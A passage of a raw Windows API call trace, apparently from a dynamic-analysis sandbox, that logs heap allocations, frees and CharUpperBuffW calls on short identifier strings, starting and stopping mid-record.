0x2aaa888 [0157.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0157.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0157.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0157.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0157.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0157.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0157.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0157.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0157.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0157.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0157.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0157.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0157.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0157.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0157.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0157.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0157.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0157.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0157.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0157.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0157.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0157.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0157.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0157.612] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0157.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0157.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0157.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa888 [0157.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0157.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0157.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0157.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0157.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0157.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0157.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0157.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0157.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0157.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0157.612] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0157.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0157.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0157.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0157.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0157.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0157.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0157.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0157.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0157.612] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0157.612] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0157.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0157.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0157.613] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0157.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0157.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0157.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9d8 [0157.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74160 [0157.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0157.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0157.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0157.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0157.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0157.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0157.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0157.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0157.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0157.613] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0157.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0157.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0157.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0157.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0157.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0157.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0157.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0157.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0157.613] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0157.613] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0157.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0157.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0157.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0157.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0157.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74160 | out: hHeap=0x2af0000) returned 1 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0157.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0157.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0157.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0157.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0157.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0157.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0157.614] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0157.614] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0157.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0157.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0157.615] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0157.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0157.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0157.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaaf8 [0157.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74820 [0157.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0157.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0157.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0157.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0157.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0157.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0157.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0157.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0157.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0157.615] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0157.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0157.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0157.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0157.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0157.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0157.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0157.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0157.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0157.615] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0157.615] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0157.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0157.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0157.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0157.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0157.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0157.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0157.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0157.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0157.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74820 | out: hHeap=0x2af0000) returned 1 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0157.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0157.616] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0157.616] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0157.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0157.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0157.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0157.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0157.617] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0157.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8a0 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0157.617] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0157.617] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0157.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0157.618] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0157.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0157.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0157.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0157.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0157.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0157.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0157.618] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0157.618] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 